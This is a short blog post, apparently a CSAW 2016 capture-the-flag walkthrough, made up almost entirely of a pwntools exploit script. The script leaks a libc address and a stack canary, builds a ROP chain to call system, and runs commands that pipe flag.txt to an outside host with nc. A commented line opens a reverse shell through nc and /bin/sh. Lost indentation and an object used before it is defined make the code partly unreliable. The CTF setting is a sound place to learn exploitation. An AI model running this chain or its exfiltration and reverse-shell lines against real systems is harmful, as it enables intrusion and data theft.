2016 CSAW CTF Tutorial
by St1tch
from pwn import *
import stitch
local = False
if local :
s = remote('localhost', 8005)
else :
s = remote('pwn.chal.csaw.io', 8002)
raw_input()
def solve() :
p.status('leak puts addr')
s.recvuntil('>')
sleep(1)
s.sendline('1')
puts = int(s.recvuntil('\n').split(':')[1].strip('0x'), 16) + 1280
libc = stitch.find_libc({'puts':hex(puts)[-3:]})[0]
offset = puts - libc['puts']
poprdi = offset + libc['poprdi_ret']
system = offset + libc['system']
log.success('puts addr = %s'%(hex(puts)))
log.success('system addr = %s'%(hex(system)))
log.success('poprdi addr = %s'%(hex(poprdi)))
p.status('leak canary')
s.recvuntil('>')
sleep(1)
s.sendline('2')
sleep(1)
s.recvuntil('>')
s.sendline('a'* 0x137)
s.recv(0x138)
canary = u64(s.recv(8))
rbp = 0x00007fff00000000 + u32(s.recv(4)) - 48
log.success('rbp = %s'%(hex(rbp)))
log.success('canary = %s'%(hex(canary)))
p.status('remote shell!')
s.recvuntil('>')
sleep(1)
s.sendline('2')
s.recvuntil('>')
#cmd = 'ls | nc kimtae.xyz 8888\x00'
cmd = 'cat flag.txt | nc kimtae.xyz 8888\x00'
#cmd = 'nc kimtae.xyz 8888 | /bin/sh | nc kimtae.xyz 8889\x00'
pay = 'a' * 0x138
pay += p64(canary)
pay += 'a'*8
pay += p64(poprdi)
pay += p64(rbp+32)
pay += p64(system)
pay += cmd
sleep(1)
s.sendline(pay)
p.success('Sending cmd!')
s.interactive()
if __name__ == '__main__' :
p = log.progress('Start pwning...')
solve()
블로그의 정보
튜기's blogg(st1tch)
St1tch